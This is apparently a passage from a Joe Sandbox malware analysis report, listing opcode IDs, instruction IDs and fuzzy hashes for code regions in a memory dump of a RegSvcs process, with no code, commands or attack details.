• Instruction ID: c9001a00a22348dfb1ec850edb1d8d2d847cc11427cc8d01fcc84618d5a140bb
• Opcode Fuzzy Hash: 2ffa6eceb965f4adc5d09f9335d5bcc9d89c23a941f0fb8c1996bbda66c574c9
• Instruction Fuzzy Hash: 1E81A3B1E006169FDB28CF69D944ABEBBF9FB58740F04852EE455EB640E334D940CBA4

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
• Instruction ID: b40d23d0d0803aa22e3b53c0ba26bfea274d82b14ec5c39e25c909f1151a8fae
• Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
• Instruction Fuzzy Hash: 80818272A0020A9FDF59DF99C890AAEBBF6BF84310F14866DDD169B345D734E901CB80

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc481bd4c3ad847ef393f849363d3352260b0c10ddea536a780e48f40d172f6f
• Instruction ID: bd799331de9b62a0bc526b83589ed09ed91e66794dc877677520e231f9199130
• Opcode Fuzzy Hash: fc481bd4c3ad847ef393f849363d3352260b0c10ddea536a780e48f40d172f6f
• Instruction Fuzzy Hash: 36816F71900609AFDB25CFA8C881AEEBBFAFF88714F10442DE556AB250D730BC05CB60

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 63f134205dbb597f48477bd9366f9eff3ffeefeaf79a05343d730fc6e2b0c338
• Instruction ID: 3902a18e55884a585c1f1d776e2c341b2e56e28841043500019419fc54c684de
• Opcode Fuzzy Hash: 63f134205dbb597f48477bd9366f9eff3ffeefeaf79a05343d730fc6e2b0c338
• Instruction Fuzzy Hash: AD71AC7590466ADBCB25CF58D8907BEBBB5FF48710F54455EEA42AF390E7309800CBA0

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08dcda320c258c20098fcc23aa0d64c7c1a91abeb3dc42c312cfbe2d9b2eec60
• Instruction ID: 877dd39eb1777ddc002b606f8dcf4715adcaf15e8fe82e7548cd1d5df92a06fe
• Opcode Fuzzy Hash: 08dcda320c258c20098fcc23aa0d64c7c1a91abeb3dc42c312cfbe2d9b2eec60
• Instruction Fuzzy Hash: 38719F71900205EFDB20DF99DE42B9EBBF9FF90300F10925AEA11AB359CB318981CB54

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6520d66d1e502fb63f1b1331d8625322b8451e24c54e763e5b9376b0e4f75158
• Instruction ID: 5cf2add3a351b7ef2c9882148657276f5ed72f26978c1f315d62aaf2758a7c97
• Opcode Fuzzy Hash: 6520d66d1e502fb63f1b1331d8625322b8451e24c54e763e5b9376b0e4f75158
• Instruction Fuzzy Hash: 0871AC356446429FD312DF2CC481B6EBBE5FF88310F4485AAE8998F352EB34D946CB91

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
• Instruction ID: 994230561d0bdc61ee508da366580cbf0a2593b2b261258b05267b84ee35dcb9
• Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
• Instruction Fuzzy Hash: E3715F71A0061AEFDB10DFA9C984EDEBBB9FF88704F144569E505EB250DB34EA41CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05eb5c077ee49f15f869fb2ac5dd881870f8ac78bf9d0a26c574ef0fc4f14a1c
                                                                                                              • Instruction ID: 4b17f2815647a83835ae111b0509bfc63029153139f7c36e0ba182a27de0be3e
                                                                                                              • Opcode Fuzzy Hash: 05eb5c077ee49f15f869fb2ac5dd881870f8ac78bf9d0a26c574ef0fc4f14a1c
                                                                                                              • Instruction Fuzzy Hash: 24710432240B12AFE732CF18CC44F5ABBA6FF80714F148518EA968B2A0D770E945CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f0e0846f74d36af0fafbb56795e6f571f8565a1c8a62a84e6b72dedf11b35f30
                                                                                                              • Instruction ID: 30008b02db2b1e4c95e6394b5fa9f98df46e3b9f6767d1fa0346f107d6cfab5e
                                                                                                              • Opcode Fuzzy Hash: f0e0846f74d36af0fafbb56795e6f571f8565a1c8a62a84e6b72dedf11b35f30
                                                                                                              • Instruction Fuzzy Hash: D4710971E0020AAFDB16DBA4CC41FEEBBBDFB44354F104169E611BB290E774AA45CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08389916ab772ca90a5c35acf0a8b9232bf9edf705cc026b2eed675bbc9c5c9b
                                                                                                              • Instruction ID: aac0f3dc9dac5138e338570e3940eddead739f233b6b6c9989d18d028f828983
                                                                                                              • Opcode Fuzzy Hash: 08389916ab772ca90a5c35acf0a8b9232bf9edf705cc026b2eed675bbc9c5c9b
                                                                                                              • Instruction Fuzzy Hash: 0951BE72545612BFD722DEA8CC44A9FBBE8EBC4750F014929FA41DB250D770ED0587A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52dce73e07561fa582ee4566d6345b9cdbec0a98fffbfc8a978ceb4821c7f2c5
                                                                                                              • Instruction ID: 41367952c9d285b9ea57a1c49882e84d8330df38facb3cca438e576c257c5ced
                                                                                                              • Opcode Fuzzy Hash: 52dce73e07561fa582ee4566d6345b9cdbec0a98fffbfc8a978ceb4821c7f2c5
                                                                                                              • Instruction Fuzzy Hash: 1C519E70900705AFD721DF9AC880A9BFBFDBF94710F10471EE19657AA2C7B0A545CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e9eac073f052f112e2345eef6a231ee3a74ea5e4cba7f59fe675410860ec67c2
                                                                                                              • Instruction ID: 8489e331530b539fe31faea3f8c7b32cfb97b0121994c35e6853b11f924de3a2
                                                                                                              • Opcode Fuzzy Hash: e9eac073f052f112e2345eef6a231ee3a74ea5e4cba7f59fe675410860ec67c2
                                                                                                              • Instruction Fuzzy Hash: 52518A71640A06EFCB22EFA9CD90E6AB7FAFF54744F40086DE5458B261D730E940CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3046d95dbee8bf34ed73a1dd13128374111d165c7b37641b840b45d1ec643cf0
                                                                                                              • Instruction ID: cb2594d6a4f198d9dc9fdd0a0b7244f2f65669265c94097d6d6ab2db1df3888e
                                                                                                              • Opcode Fuzzy Hash: 3046d95dbee8bf34ed73a1dd13128374111d165c7b37641b840b45d1ec643cf0
                                                                                                              • Instruction Fuzzy Hash: A75134716083429FE754DF2AC881A6BBBE5BFC8208F444A2DF589C7350EB31D905CB96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction ID: fb74f9d717c8394142bbc1ca9311fc99bc2323091e3b3ccb8c08b1765ecb87ec
                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction Fuzzy Hash: B2517171E0021AABDF25DF98C480BEEBBB5BF49754F044069EA02AF241E774DD45CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction ID: 58ebc16b6ab002ce701c8a0d9c21950d2962a7b3bf60c140a1dbdea5345bbb82
                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction Fuzzy Hash: 75519371D0020AAFEF22DB94CD84BAEBB75BF40324F194669DD1267294D772DE418BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e759f67711c740c914d0ebf696952b1f061adc4503914da3a10f1b65131104ad
                                                                                                              • Instruction ID: 0c9ab1c7bf73f3b6f9a6581f282ec64d8745ce7d457e12db165f13e001ed30bd
                                                                                                              • Opcode Fuzzy Hash: e759f67711c740c914d0ebf696952b1f061adc4503914da3a10f1b65131104ad
                                                                                                              • Instruction Fuzzy Hash: C141D5717016129BDBA9DB2ECC94B7BBB9FEF90220F088219ED5587B81DB34D801C791
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ae284829b2faa11f86d4b0ba7051a6807d4cdb1f0567a5adc0a6795d7ff4cf9
                                                                                                              • Instruction ID: 6e3430c2707d4903f22fdaf27f21eb8bb778ac424a4c597e65e3420fa2d82af0
                                                                                                              • Opcode Fuzzy Hash: 3ae284829b2faa11f86d4b0ba7051a6807d4cdb1f0567a5adc0a6795d7ff4cf9
                                                                                                              • Instruction Fuzzy Hash: CA51CFB2D40216EFCB20DFA9CC90AAEBBB9FF88318B594519D505A7308D770ED41CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction ID: 1a193c25de2dd464e426fcd7bc7ac6255325654029dbc9391d6c4f40eb88c5ca
                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction Fuzzy Hash: 2641A2716007169FDB65CFA8CD84A6AB7A9FF84214F05862EED528B740EB30ED15C7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 96b598a73bc7fa7f2df1366a313893c83593d3b7e8d5e8627af78f2ee4e4b3c0
                                                                                                              • Instruction ID: 2c940082d8468f2f7b8beb955d044835a4d0be7c8e961434a925c685b587b3e8
                                                                                                              • Opcode Fuzzy Hash: 96b598a73bc7fa7f2df1366a313893c83593d3b7e8d5e8627af78f2ee4e4b3c0
                                                                                                              • Instruction Fuzzy Hash: 27418C3A90021ADFDB15DFD8C440AEEB7B5BF98A10F14815EF915EB280D7359D41CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7890c25bef7f5e9821932b9ef68a7ed862a86054d9a1b253aa0ff8b7b3bf5ff4
                                                                                                              • Instruction ID: 7b39367b5e23eeaf1c20faf21765a7303f2d415bab5a25f33b7493635db0ba75
                                                                                                              • Opcode Fuzzy Hash: 7890c25bef7f5e9821932b9ef68a7ed862a86054d9a1b253aa0ff8b7b3bf5ff4
                                                                                                              • Instruction Fuzzy Hash: 8541E4722043029FD721DF28C886AAFB7E5FF88214F18492EE657CB651EB70E844CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction ID: 628b60dd38f38b0b505697f629be063f1885d16f92cb390192d0d6773de0ad7d
                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction Fuzzy Hash: 4B516C75A01215CFCB1ACF98C880AAEF7B2FF84750F1581A9D915E7391D770AE42CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60393afba14e049b12507103a45d156843150894717b28434ec12c8c6b971a73
                                                                                                              • Instruction ID: 3a9ae2ed893acd4f48c78bffe37d2d7280fa387b190e071a274bfdf9ad7cd18a
                                                                                                              • Opcode Fuzzy Hash: 60393afba14e049b12507103a45d156843150894717b28434ec12c8c6b971a73
                                                                                                              • Instruction Fuzzy Hash: 0F51E2B09402179FDF259B28CC00BADBBB1FF51314F0482A9E529AF2C2E7349985CF41
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12430a0306cda981050e6c9ea7b73217e448ad9f090b86053836558c2d247b35
                                                                                                              • Instruction ID: c5503bf3b3182bcc6ba0da493642dadb33a9c2356111986881e9b5e5cc108fcc
                                                                                                              • Opcode Fuzzy Hash: 12430a0306cda981050e6c9ea7b73217e448ad9f090b86053836558c2d247b35
                                                                                                              • Instruction Fuzzy Hash: 6231EF322452019FC321DF19DC81F2AB7E6FF84360F0A446EE9959B751DB30A810CB84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 96fba42434c57b599ab243d9d9ad6b8dd9a3fc8c70aa2b50c04e7cf7c879ef64
                                                                                                              • Instruction ID: 9305338738b328e3343cea0040150bc9eb4d82f0e46e56e24a7e09d0daf9bed0
                                                                                                              • Opcode Fuzzy Hash: 96fba42434c57b599ab243d9d9ad6b8dd9a3fc8c70aa2b50c04e7cf7c879ef64
                                                                                                              • Instruction Fuzzy Hash: 2D41A275200B45DFDB22CF28C981B9A7BEABF45314F04481DE6598F291D774E841CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2324623c0886e44a3692bfe65038024eba9d9c433f47cc36534b440ee77f58ba
                                                                                                              • Instruction ID: b659ac27cc17f0b4a1772058114fa9030134a689dcc332ebd85fd27676a83a76
                                                                                                              • Opcode Fuzzy Hash: 2324623c0886e44a3692bfe65038024eba9d9c433f47cc36534b440ee77f58ba
                                                                                                              • Instruction Fuzzy Hash: 9C317A716043029FD320DF29CC82B2AB7E5FB84720F09496DE9959B791EB30E815CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 36131bd5766ae502713355705deaca2375a188c7accf7f51837a9eb6605a69f1
                                                                                                              • Instruction ID: 83dcee49ed9426befb8a71999556353c514772d5ac427ea1502f7c552ab1311e
                                                                                                              • Opcode Fuzzy Hash: 36131bd5766ae502713355705deaca2375a188c7accf7f51837a9eb6605a69f1
                                                                                                              • Instruction Fuzzy Hash: 8531EA71241A92DBF32B579CCE48B16BBD8FB40784F1D08A4EB458B7D1DB69D841C270
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ccbb2650be16b56bb5b75d9e99cfb0e5c4e39943c0a6aa5b1de19c66804f9773
                                                                                                              • Instruction ID: 419bc9855d4670d45dba471bb060f7ab3f3a9a5f80f9fb7ba75986456df422fb
                                                                                                              • Opcode Fuzzy Hash: ccbb2650be16b56bb5b75d9e99cfb0e5c4e39943c0a6aa5b1de19c66804f9773
                                                                                                              • Instruction Fuzzy Hash: A531A175A0025AEBDB15DF98CC40FAEB7B5FB44B80F858169E900EB254D770ED41CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0f75bb0275caec53d7f356e5476f36516aca5c2711879d5955fff8c74132605d
                                                                                                              • Instruction ID: 60ac3a45ae126afa241d3b1c8d0625e1feebf95f9ae5aa669de5136e5763717d
                                                                                                              • Opcode Fuzzy Hash: 0f75bb0275caec53d7f356e5476f36516aca5c2711879d5955fff8c74132605d
                                                                                                              • Instruction Fuzzy Hash: 68313076A4012DABCF21DF58DC84BDEBBBAABD8350F1401E5A508A7250DB34DE918F90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fcbe5284c0dffe1f9e68617a914b9728e46d88669c3456c5c8449cd1eeabb255
                                                                                                              • Instruction ID: 6f3fd55c8917c349c1a2385c35ad20a8d698fe941e9db171141f9abb16062f03
                                                                                                              • Opcode Fuzzy Hash: fcbe5284c0dffe1f9e68617a914b9728e46d88669c3456c5c8449cd1eeabb255
                                                                                                              • Instruction Fuzzy Hash: C431C972E00215AFDB31DFA9CC81AEEBBF9FF44750F054466E515DB250D6709E008BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                                                                              • Instruction ID: 0ed8d8c656f10431c76010a1adf9c5997cad602f54bd229dc1ef175ba2043574
                                                                                                              • Opcode Fuzzy Hash: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                                                                              • Instruction Fuzzy Hash: 2131C071A40606AFDB22AFADCC50B7EB7BABF84755F404169E906DB352DA70DC01CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c716de0ffd11ac6b246ff4ea0ff66152378b2eb19f8e74b812309f3a59c3bbc5
                                                                                                              • Instruction ID: ee5132bc7dd2192b0878f469394649bfb3f947f1842d6634685465aa19dcc5e2
                                                                                                              • Opcode Fuzzy Hash: c716de0ffd11ac6b246ff4ea0ff66152378b2eb19f8e74b812309f3a59c3bbc5
                                                                                                              • Instruction Fuzzy Hash: 59319372B04612DBCB12DE24C89096BBBE9FFD4650F054969FD59AF290DA30DC1187E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                                                                              • Instruction ID: af415e29defa61a62dcfa92e45d46fa67d3a56923cbcc74660278cb8de10581a
                                                                                                              • Opcode Fuzzy Hash: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                                                                              • Instruction Fuzzy Hash: CE3181B26053019FE720CF19C840B1BBBE9FB98700F05496DEA849B791D770E848CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction ID: fabc4e77b77589bbb3955aa63cf91d37c269d50430105476ee2a9e0ae352542f
                                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction Fuzzy Hash: CC3128B2B00B05AFD765CFADCE40B57BBF8BB48A50F04092DA59AC7650F730E9008B60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a749469d350c49db5137aefa095754efb7a92d986243e7547c21a713910be63d
                                                                                                              • Instruction ID: e3b41fbae8fd990d5df375d05923d88b6e6d30ae35ec41b7eaf314ed9fcf32db
                                                                                                              • Opcode Fuzzy Hash: a749469d350c49db5137aefa095754efb7a92d986243e7547c21a713910be63d
                                                                                                              • Instruction Fuzzy Hash: 7331BA71A453029FC711EF19C94095EBBF1FFC9614F444AAEE498AB311E332D946CBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
